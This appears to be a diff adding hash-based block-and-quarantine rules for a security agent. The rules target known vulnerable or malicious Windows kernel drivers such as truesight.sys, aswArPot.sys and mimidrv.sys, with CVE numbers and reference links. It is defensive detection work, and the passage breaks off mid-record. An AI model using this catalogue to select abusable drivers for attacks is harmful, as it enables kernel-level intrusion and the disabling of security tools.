+ "value": "ccb6149fd214027de4fff2fcde8040b009d6c9e397523914a4512a8e71510a4b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2757b5f1-b6aa-5cb9-8fc5-52943094930c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480134Z",
+ "creation_date": "2026-03-23T11:45:30.480136Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9e0c2a569ab02742fa3a37846310a1d4e46ba2bfd4f80e16f00865fc62690cb",
+ "comment": "Vulnerable Kernel Driver (aka IoAccesssys.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2762d5e1-3063-5305-a155-73a580ac208c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818172Z",
+ "creation_date": "2026-03-23T11:45:30.818174Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818180Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b074caef2fbf7e1dc8870edccb65254858d95836f466b4e9e6ca398bf7a27aa3",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "27667b97-5ddc-5f3d-8f8d-b4ef2072d05d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981570Z",
+ "creation_date": "2026-03-23T11:45:29.981573Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981578Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2ec3b2a93c473d88bfdf2deb1969d15ab61737acc1ee8e08234bc5513ee87ea",
+ "comment": "Vulnerable Kernel Driver (aka gametersafe.sys) [https://www.loldrivers.io/drivers/1ab1ec8c-1231-4ba4-8804-4a2cda103bb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "27671ae9-422c-59b8-9cb2-f15aa17b3f64",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471410Z",
+ "creation_date": "2026-03-23T11:45:30.471413Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471423Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1997e2a6302f3196975f858fef63188a249f79b6c2982d31ae07405e8aada58f",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/fbdd993b-47b1-4448-8c41-24c310802398/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "276755f2-5b5d-5a6a-85b0-9a65b6019104",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604772Z",
+ "creation_date": "2026-03-23T11:45:29.604774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604779Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "69527aa5ad089d9731e0054a32c9626a8d25416664f8d9b444bec674ba695ad5",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "277a237b-3f4b-5db9-8a7f-9962a2c1005d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973217Z",
+ "creation_date": "2026-03-23T11:45:29.973219Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973224Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8907c476440abdd7f71feb068443a7c9736aa6bf625dfb8b6931c46341aa4abf",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "27b4489c-d4a0-55cd-a711-fe94c9f09d18",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828137Z",
+ "creation_date": "2026-03-23T11:45:30.828139Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828145Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c31418c493f33151a86bca000d364ef472a07650f87cbf02cdb1ed9915a9e6f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "27b74b27-493b-51ce-b86c-aa0aea168ea0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478863Z",
+ "creation_date": "2026-03-23T11:45:31.478866Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478891Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04bcb3a05961381a4e28a05901a21c6ce15437e59482db083b4e46dfc666722e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "27cf7ff6-ac99-5286-a09d-b03de2c32282",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970228Z",
+ "creation_date": "2026-03-23T11:45:29.970230Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970235Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5eb493fc07a9573176f87297a002183d8e60104619a7b83940ce6e83ac54cd7b",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "27d19d51-37fe-55b8-ac03-a67ae9b674c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807330Z",
+ "creation_date": "2026-03-23T11:45:31.807333Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7de59866f3420467502e2bf8cab8171c9fc259f7380cb5a2c7d833d16d1e2edf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "27d749a8-0ed6-54a9-b581-dd5b7acb6f91",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454211Z",
+ "creation_date": "2026-03-23T11:45:30.454214Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454224Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "752b31418053dc19c0573d16953d5ad24723bd57e5f62eff391e632548855b5f",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "27ecaede-842f-5c3b-9c7d-228ae9641950",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829845Z",
+ "creation_date": "2026-03-23T11:45:30.829847Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829852Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7abb86c7ad13581e0cb1be79bb579efe786f1253a3fcaf6fae7607fe09bc34dc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "27f6ea07-4a09-5975-bf08-315e635e44da",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613065Z",
+ "creation_date": "2026-03-23T11:45:29.613067Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613072Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602",
+ "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "280076a1-ae2a-5916-9aca-916ed89c5618",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817634Z",
+ "creation_date": "2026-03-23T11:45:31.817637Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817646Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a040bd51630fb46f624f359ea7cd6fe929816563f927f16ff125e23b1e2917bb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2806f6bb-58d0-5a3b-b9cc-70d097149010",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500362Z",
+ "creation_date": "2026-03-23T11:45:31.500365Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500374Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dc876fa85717a697e284839410f09ee617bdfe62a75f9ca523ca6545093ab360",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "280ddff5-ef75-5484-8a3d-2fca7695d64f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470251Z",
+ "creation_date": "2026-03-23T11:45:30.470254Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470264Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7adc0785210452664cb684b2c7687589090d31f2a3d0892e8e520145c0799110",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "280eca09-6c68-534c-a356-ba5178908770",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974315Z",
+ "creation_date": "2026-03-23T11:45:29.974317Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974323Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb14c5db8307488809897be13c66ef02941f6020f9c34a9664db92a00d551f4a",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "28129e27-5790-5199-8968-7ebf1df0e7d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827658Z",
+ "creation_date": "2026-03-23T11:45:31.827660Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827666Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "accd4f23f1b4ec1e16b5107fa7d59eefa1e901c38c1947afe4e132280710f539",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2824d10a-1f6b-533b-8757-6fad13e866e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832782Z",
+ "creation_date": "2026-03-23T11:45:30.832783Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832789Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d42a4554c469020a44eb69cd4ec99bcddb093193a7b75127f82fe2785581dbb9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "282df111-e5d7-50de-8a7e-8045a55ae115",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479241Z",
+ "creation_date": "2026-03-23T11:45:30.479243Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479249Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2fb5d7e6db01c9090bba92abf580d38993e02ce9357e08fe1f224a9b18056e5a",
+ "comment": "Vulnerable Kernel Driver (aka directio32_legacy.sys) [https://www.loldrivers.io/drivers/7a0842ca-1a64-4ad1-9d66-25eb983d1742/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "28371d22-67e8-575e-b9bc-35dd9cea87f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827640Z",
+ "creation_date": "2026-03-23T11:45:31.827642Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827648Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d05c17f5dc4ea2fe3f5bcca774e83fe8b521d1e6fad60ee5178810c40bd10cb1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "28382674-0187-598e-a00a-6f2270ed0c9c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615169Z",
+ "creation_date": "2026-03-23T11:45:29.615171Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a05ad47cd63932b3df2d0f1f42617321729772211bec651fe061140d3e75957",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "283e5bca-9901-5e4b-964e-c78cc7c5b22c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
